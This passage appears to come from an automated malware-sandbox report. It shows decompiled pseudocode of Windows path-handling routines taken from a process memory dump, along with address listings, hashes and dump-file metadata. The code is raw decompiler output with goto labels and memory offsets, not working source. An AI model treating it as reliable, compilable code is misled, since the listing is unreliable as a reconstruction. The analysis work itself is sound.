																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E04B84CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E04B0D130(_t427, _t494, _t511);
				}
			}

0x04b85ba5
0x04b85baa
0x04b85baf
0x04b85bb4
0x04b85bb6
0x04b85bbc
0x04b85bbe
0x04b85bc4
0x04b85bcd
0x04b85bd3
0x04b85bd6
0x04b85bdc
0x04b85be0
0x04b85be3
0x04b85beb
0x04b85bf2
0x04b85bf8
0x04b85bfe
0x04b85c04
0x04b85c0e
0x04b85c18
0x04b85c1f
0x04b85c25
0x04b85c2a
0x04b85c2c
0x04b85c32
0x04b85c3a
0x04b85c3f
0x04b85c42
0x04b85c48
0x04b85c5b
0x04b85c5b
0x04b85c2c
0x04b85cb7
0x04b85cb9
0x04b85cbf
0x04b85cc2
0x04b85cca
0x04b85ccb
0x04b85ccb
0x04b85cd1
0x04b85cd7
0x04b85cda
0x04b85ce1
0x04b85ce4
0x04b85ce7
0x04b85ced
0x04b85cf3
0x04b85cf9
0x04b85cff
0x04b85d08
0x04b85d0a
0x04b85d0e
0x04b85d10
0x00000000
0x00000000
0x04b85d16
0x04b85d1a
0x00000000
0x00000000
0x04b85d20
0x04b85d22
0x04b85d25
0x04b85d2f
0x04b85d2f
0x04b85d33
0x04b85d3d
0x04b85d49
0x04b85d4b
0x00000000
0x00000000
0x04b85d5a
0x04b85d5d
0x04b85d60
0x00000000
0x00000000
0x04b85d66
0x04b85d69
0x00000000
0x00000000
0x04b85d6f
0x04b85d6f
0x04b85d73
0x04b85d79
0x04b85d7f
0x04b85d86
0x04b85d95
0x04b85d98
0x04b85dba
0x04b85dcb
0x04b85dce
0x04b85dd3
0x04b85dd6
0x04b85dd8
0x04b85de6
0x04b85dec
0x04b85dee
0x04b85df1
0x04b85df3
0x04b8635a
0x04b8635a
0x00000000
0x04b8635a
0x04b85dfe
0x04b85e02
0x04b85e05
0x04b85e07
0x04b85e10
0x04b85e13
0x04b85e1b
0x04b85e1c
0x04b85e21
0x04b85e22
0x04b85e23
0x04b85e25
0x04b85e2a
0x04b85e2c
0x04b85e2e
0x04b85e36
0x04b85e39
0x04b85e42
0x04b85e47
0x04b85e4d
0x04b85e54
0x04b85e54
0x04b85e54
0x04b85e2e
0x04b85e5c
0x04b85e5f
0x04b85e62
0x04b85e64
0x04b85e6b
0x04b85e70
0x04b85e7a
0x04b85e7a
0x04b85e7a
0x04b85e6b
0x04b85e7e
0x04b85e7f
0x04b85e7f
0x04b85e81
0x04b85e87
0x04b85e8b
0x04b85e8c
0x04b85e8c
0x04b85e8c
0x04b85e9a
0x04b85e9c
0x04b85ea2
0x04b85ea6
0x04b85f50
0x04b85f50
0x04b85f57
0x04b85f66
0x04b85f66
0x04b85f66
0x04b85f68
0x04b85f6a
0x04b863d0
0x00000000
0x04b85f70
0x04b85f70
0x04b85f91
0x04b85f9c
0x04b85f9e
0x04b85fa4
0x04b85fa6
0x04b8638c
0x04b86392
0x04b863a1
0x04b863a7
0x04b863af
0x04b863af
0x04b863bd
0x04b863d8
0x00000000
0x04b863d8
0x04b85fac
0x04b85fb2
0x04b85fb4
0x04b85fbd
0x04b85fc6
0x04b85fce
0x04b85fd4
0x04b85fdc
0x04b85fec
0x04b85fed
0x04b85fee
0x04b85fef
0x04b85ff9
0x04b85ffa
0x04b85ffb
0x04b85ffc
0x04b86000
0x04b86004
0x04b86012
0x04b86012
0x04b86018
0x04b86019
0x04b8601a
0x04b8601b
0x04b8601c
0x04b86020
0x04b86059
0x04b8605c
0x04b86061
0x04b86061
0x04b86022
0x04b86022
0x04b86022
0x04b86025
0x04b8602a
0x04b8602b
0x04b86031
0x04b86037
0x04b86038
0x04b8603e
0x04b86048
0x04b86049
0x04b8604a
0x04b8604b
0x04b8604c
0x04b8604d
0x04b86053
0x04b86054
0x04b86054
0x04b86062
0x04b86065
0x04b86067
0x04b8606a
0x04b86070
0x04b86075
0x04b86076
0x04b86081
0x04b86087
0x04b86095
0x04b86099
0x04b8609e
0x04b860a4
0x04b860ae
0x04b860b0
0x04b860b3
0x04b860b6
0x04b860b8
0x04b860ba
0x04b860ba
0x04b860ba
0x04b860ba
0x04b860be
0x04b860c0
0x04b860c5
0x04b860c5
0x04b860c5
0x04b860c6
0x04b860cd
0x04b86114
0x04b860cf
0x04b860cf
0x04b860d4
0x04b860d5
0x04b860da
0x04b860db
0x04b860e1
0x04b860e2
0x04b860e8
0x04b860f8
0x04b860fd
0x04b860fe
0x04b86102
0x04b86104
0x04b86107
0x04b86109
0x04b8610b
0x04b8610b
0x04b8610b
0x04b8610b
0x04b8610f
0x04b8610f
0x04b86117
0x04b8611a
0x04b8611f
0x04b86125
0x04b86134
0x04b86139
0x04b8613f
0x04b86146
0x04b86148
0x04b8614b
0x04b8614d
0x04b8614f
0x04b8614f
0x04b8614f
0x04b8614f
0x04b86153
0x04b86159
0x04b86159
0x04b8615c
0x04b86163
0x04b86169
0x04b8616c
0x04b86172
0x04b86181
0x04b86186
0x04b86187
0x04b8618b
0x04b86191
0x04b86195
0x04b861a3
0x04b861bb
0x04b861c0
0x04b861c3
0x04b861cc
0x04b861d0
0x04b861dc
0x04b861de
0x04b861e1
0x04b861e4
0x04b861e6
0x04b861e8
0x04b861e8
0x04b861e8
0x04b861e8
0x04b861e6
0x04b861ec
0x04b861f3
0x04b86203
0x04b86209
0x04b8620a
0x04b86216
0x04b8621d
0x04b86227
0x04b86241
0x04b86246
0x04b8624c
0x04b86257
0x04b86259
0x04b8625c
0x04b8625e
0x04b86260
0x04b86260
0x04b86260
0x04b86260
0x04b8625e
0x04b86264
0x04b86267
0x04b86269
0x04b86315
0x04b86315
0x04b8631b
0x04b8631e
0x04b86324
0x04b86327
0x04b8632f
0x04b86330
0x04b86333
0x04b8633a
0x04b8633c
0x04b86335
0x04b86335
0x04b86335
0x04b8633f
0x04b86342
0x04b8634c
0x04b86352
0x04b86355
0x04b86355
0x04b86359
0x00000000
0x04b8626f
0x04b86275
0x04b86275
0x04b86278
0x04b8627e
0x04b8627e
0x04b86281
0x04b86287
0x04b8628d
0x04b86298
0x04b8629c
0x04b862a2
0x04b8629e
0x04b8629e
0x04b8629e
0x04b862a7
0x04b862a7
0x04b862aa
0x04b862b0
0x04b862f0
0x04b862f0
0x04b862f2
0x04b862f8
0x04b862fd
0x04b862b2
0x04b862b2
0x04b862b2
0x04b862b5
0x04b862dd
0x04b862e2
0x04b862e5
0x04b862b7
0x04b862b8
0x04b862bb
0x04b862bd
0x04b862c0
0x04b862c4
0x04b862cd
0x04b862cd
0x04b862c0
0x04b862bb
0x04b862b5
0x04b86302
0x04b86303
0x04b86305
0x04b86305
0x04b86305
0x04b8630c
0x04b8630c
0x00000000
0x04b8627e
0x04b86269
0x04b85eac
0x04b85ebb
0x04b85ebe
0x04b85ecb
0x04b85ecb
0x04b85ece
0x04b85ece
0x04b85ed4
0x04b85ed7
0x04b85ed9
0x04b85edb
0x04b85edb
0x04b85ee1
0x04b85ee1
0x04b85ee3
0x04b85f20
0x04b85f20
0x04b85ee5
0x04b85ee5
0x04b85ee5
0x04b85ee8
0x04b85f11
0x04b85f18
0x04b85eea
0x04b85eea
0x04b85eed
0x04b85ef2
0x04b85ef8
0x04b85efb
0x04b85f0a
0x04b85f0a
0x04b85eed
0x04b85ee8
0x04b85f22
0x04b85f28
0x00000000
0x00000000
0x04b85f30
0x04b85f31
0x04b85f37
0x04b85f3a
0x04b85f3d
0x04b85f44
0x00000000
0x00000000
0x00000000
0x04b85f46
0x04b85f48
0x04b85f4d
0x00000000
0x04b85f4d
0x04b85dda
0x04b85ddf
0x00000000
0x04b85ddf
0x04b85dd8
0x04b85da7
0x04b85da9
0x04b85dac
0x04b85dae
0x00000000
0x04b85db4
0x04b85db4
0x00000000
0x04b85db4
0x04b85dae
0x04b85d88
0x04b85d8d
0x04b86363
0x04b86369
0x04b8636a
0x04b86370
0x04b86372
0x04b8637a
0x04b8637b
0x04b8637d
0x00000000
0x00000000
0x04b8637f
0x04b86385
0x00000000
0x04b86385
0x04b85d38
0x04b85d3b
0x00000000
0x00000000
0x00000000
0x04b85d3b
0x04b85d27
0x04b85d29
0x00000000
0x00000000
0x00000000
0x04b86360
0x00000000
0x04b86360
0x04b85c10
0x04b85c10
0x04b863da
0x04b863e5
0x04b863e5

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac20e3516e3efd928bdba7303cd99a12aa51df6f4dbc39c7ffa102e4986732a5
Instruction ID: c6dc75e67753926bd111b3c62f9a14644af3dbccab86c00d0eb354b1309189e6
Opcode Fuzzy Hash: ac20e3516e3efd928bdba7303cd99a12aa51df6f4dbc39c7ffa102e4986732a5
Instruction Fuzzy Hash: 71423875A00229DFDB24DF68C980BA9B7B1FF49304F1481EED94DAB242E774A985CF50

Uniqueness

Uniqueness Score: -1.00%

Function 04AD4120, Relevance: .4, Instructions: 444
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E04AD4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x4bad360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E04AEF232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E04AD6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L04AD4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E04AD6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M04AD45F8))) {
												case 0:
													_v568 = 0x4a91078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x4a911c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L04AD4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E04AFF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E04AFF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E04AB52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E04ACEB70(1, 0x4ba79a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E04ACAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E04AF95D0();
																			L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E04AFB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E04AF3D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E04AFB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}

0x04ad4128
0x04ad4135
0x04ad413c
0x04ad4141
0x04ad4145
0x04ad4147
0x04ad414e
0x04ad4151
0x04ad4159
0x04ad415c
0x04ad4160
0x04ad4164
0x04ad4168
0x04ad416c
0x04ad417f
0x04ad4181
0x04ad446a
0x04ad446a
0x04ad418c
0x04ad4195
0x04ad4199
0x04ad4432
0x04ad4439
0x04ad443d
0x04ad4442
0x04ad4447
0x00000000
0x04ad419f
0x04ad41a3
0x04ad41b1
0x04ad41b9
0x04ad41bd
0x04ad45db
0x04ad45db
0x00000000
0x04ad41c3
0x04ad41c3
0x04ad41ce
0x04ad41d4
0x04b1e138
0x04b1e13e
0x04b1e169
0x04b1e16d
0x04b1e19e
0x04b1e16f
0x04b1e16f
0x04b1e175
0x04b1e179
0x04b1e18f
0x04b1e193
0x00000000
0x04b1e199
0x00000000
0x04b1e199
0x04b1e193
0x00000000
0x00000000
0x00000000
0x04ad41da
0x04ad41da
0x04ad41df
0x04ad41e4
0x04ad41ec
0x04ad4203
0x04ad4207
0x04b1e1fd
0x04ad4222
0x04ad4226
0x04b1e1f3
0x04b1e1f3
0x04ad422c
0x04ad422c
0x04ad4233
0x04b1e1ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x04ad4239
0x04ad4239
0x04ad4239
0x04ad4239
0x04ad4233
0x04ad4226
0x04ad41ee
0x04ad41ee
0x04ad41f4
0x04ad4575
0x04b1e1b1
0x04b1e1b1
0x00000000
0x04ad457b
0x04ad457b
0x04ad4582
0x04b1e1ab
0x00000000
0x00000000
0x00000000
0x00000000
0x04ad4588
0x04ad4588
0x04ad458c
0x04b1e1c4
0x04b1e1c4
0x00000000
0x04ad4592
0x04ad4592
0x04ad4599
0x04b1e1be
0x00000000
0x00000000
0x00000000
0x00000000
0x04ad459f
0x04ad459f
0x04ad45a3
0x04b1e1d7
0x04b1e1e4
0x00000000
0x04ad45a9
0x04ad45a9
0x04ad45b0
0x04b1e1d1
0x00000000
0x00000000
0x00000000
0x00000000
0x04ad45b6
0x04ad45b6
0x04ad45b6
0x00000000
0x04ad45b6
0x04ad45b0
0x04ad45a3
0x04ad4599
0x04ad458c
0x04ad4582
0x00000000
0x00000000
0x00000000
0x00000000
0x04ad41f4
0x04ad423e
0x04ad4241
0x04ad45c0
0x04ad45c4
0x00000000
0x04ad45ca
0x04ad45ca
0x00000000
0x04b1e207
0x04b1e20f
0x00000000
0x00000000
0x00000000
0x00000000
0x04ad45d1
0x00000000
0x00000000
0x04ad45ca
0x00000000
0x04ad4247
0x04ad4247
0x04ad4247
0x04ad4249
0x04ad4249
0x04ad4249
0x04ad4251
0x04ad4251
0x04ad4257
0x04ad425f
0x04ad426e
0x04ad4270
0x04ad427a
0x04b1e219
0x04b1e219
0x04ad4280
0x04ad4282
0x04ad4456
0x04ad45ea
0x00000000
0x04ad45f0
0x04b1e223
0x00000000
0x04b1e223
0x04ad445c
0x04ad445c
0x00000000
0x04ad445c
0x00000000
0x04ad4288
0x04ad428c
0x04b1e298
0x04ad4292
0x04ad4292
0x04ad429e
0x04ad42a3
0x04ad42a7
0x04ad42ac
0x04b1e22d
0x04ad42b2
0x04ad42b2
0x04ad42b9
0x04ad42bc
0x04ad42c2
0x04ad42ca
0x04ad42cd
0x04ad42cd
0x04ad42d4
0x04ad433f
0x04ad433f
0x04ad42d6
0x04ad42d6
0x04ad42d9
0x04ad42dd
0x04ad42eb
0x04b1e23a
0x04ad42f1
0x04ad4305
0x04ad430d
0x04ad4315
0x04ad4318
0x04ad431f
0x04ad4322
0x04ad432e
0x04ad433b
0x04ad433b
0x00000000
0x04ad432e
0x04ad42eb
0x04ad434c
0x04ad434e
0x04ad4352
0x04ad4359
0x04ad435e
0x04ad4361
0x04ad436e
0x04ad438a
0x04ad438e
0x04ad4396
0x04ad439e
0x04ad43a1
0x04ad43ad
0x04ad43bb
0x04ad43bb
0x04ad43ad
0x04ad436e
0x04ad43bf
0x04ad43c5
0x04ad4463
0x04ad4463
0x04ad43ce
0x04ad43d5
0x04ad43d9
0x04ad43df
0x04ad4475
0x04ad4479
0x04ad4491
0x04ad4491
0x04ad4479
0x04ad43e5
0x04ad43eb
0x04ad43f4
0x04ad43f6
0x04ad43f9
0x04ad43fc
0x04ad43ff
0x04ad44e8
0x04ad44ed
0x04ad44f3
0x04b1e247
0x00000000
0x04ad44f9
0x04ad4504
0x04ad4508
0x04ad450f
0x04b1e269
0x00000000
0x04ad4515
0x04ad4519
0x04ad4531
0x04ad4534
0x04ad4537
0x04ad453e
0x04ad4541
0x04ad454a
0x04b1e255
0x04b1e255
0x04b1e25b
0x04b1e25e
0x04b1e261
0x04b1e261
0x04ad4555
0x04ad4559
0x04ad455d
0x04b1e26d
0x04b1e270
0x04b1e274
0x04b1e27a
0x04b1e27d
0x04b1e28e
0x04b1e28e
0x04ad4563
0x04ad4563
0x04ad4569
0x04ad4569
0x00000000
0x04ad455d
0x04ad450f
0x00000000
0x04ad44f3
0x04ad43ff
0x04ad4405
0x04ad4405
0x04ad4405
0x04ad42ac
0x04ad428c
0x04ad4282
0x04ad4407
0x04ad440d
0x04b1e2af
0x04b1e2af
0x04ad4413
0x04ad4413
0x00000000
0x04ad41d4
0x00000000
0x04ad41c3
0x04ad41bd
0x04ad4415
0x04ad4415
0x04ad4416
0x04ad4417
0x04ad4429
0x04ad416e
0x04ad416e
0x04ad4175
0x04ad4498
0x04ad449f
0x04b1e12d
0x00000000
0x04b1e133
0x00000000
0x04b1e133
0x04ad44a5
0x04ad44a5
0x04ad44aa
0x00000000
0x04ad44bb
0x04ad44ca
0x04ad44d6
0x04ad44d7
0x04ad44d8
0x04ad44e3
0x04ad44e3
0x04ad44aa
0x04ad417b
0x04ad417b
0x04ad417b
0x00000000
0x04ad417b
0x04ad4175
0x00000000

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb58f718ede7b279a859a429c0be7eb30c7d35f1b7e53a8bda6bf280f85cb8ea
Instruction ID: 53ee66a718247b6a2dbdad44a9e7fae447ec2998eeab808d0c88dd0e8c3f963f
Opcode Fuzzy Hash: eb58f718ede7b279a859a429c0be7eb30c7d35f1b7e53a8bda6bf280f85cb8ea
Instruction Fuzzy Hash: 4EF16D706082118BDB24CF59C490A7AB7F1FF8C718F54896EF886CB260E734E995DB52

Uniqueness

Uniqueness Score: -1.00%

Function 04AE20A0, Relevance: .4, Instructions: 420
